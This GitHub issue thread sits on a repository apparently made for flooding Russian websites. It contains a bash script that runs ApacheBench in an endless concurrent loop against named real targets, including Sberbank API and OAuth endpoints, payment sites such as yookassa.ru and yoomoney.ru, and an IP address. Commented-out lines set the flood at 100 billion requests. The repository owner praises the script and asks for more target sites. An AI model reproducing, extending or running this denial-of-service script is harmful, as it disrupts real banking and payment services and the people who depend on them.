### ISSUE TITLE
Discussion

### ISSUE THREAD

**Issue by jerzybrzoska** [zzart/russian-warship-fuck-yourself#1]
I happen to write a similar script that looks like this:
```
#!/usr/bin/bash

TARGETS=("http://185.169.155.16/" 
"http://api.developer.sber.ru/product/SberbankID/" 
"http://api.sberbank.ru/prod/tokens/v2​/oauth/" 
"http://api.sberbank.ru/prod/tokens/v2​/oidc/" 
"https://www.bestchange.ru/" 
##(and the list goes on and on)
"https://yookassa.ru/"
"https://yoomoney.ru/"
"http://wikimapia.org/")

while true
do
  for t in "${TARGETS[@]}"
  do
    if [[ "${t}" != "${TARGETS[-1]}" ]]; then
	#ab -c 10 -n 100000000000 -r "${t}" &
	  ab -c 10 -n 10 -r "${t}" &
    else
      #ab -c 10 -n 100000000000 -r "${t}"
      ab -c 10 -n 10 -r "${t}"
    fi
  done
done
```
I wanted to know what is the purpose of `:` in your for loop. I use `:` for empty statements in if-else. 

P.S. `&` adds concurrency of which I was ascertained [here](https://unix.stackexchange.com/questions/692358/is-cmd1-newline-cmd2-as-concurrent-as-cmd1-cmd2-in-a-bash-script).

**Comment by zzart** [comment]
@jerzybrzoska  Nice one. I've made some changes according to your comments ;) I'm not a bash scrip expert - just putting 1 and 2 together.

**Comment by zzart** [comment]
If you wish please contribute to the list of the sites.
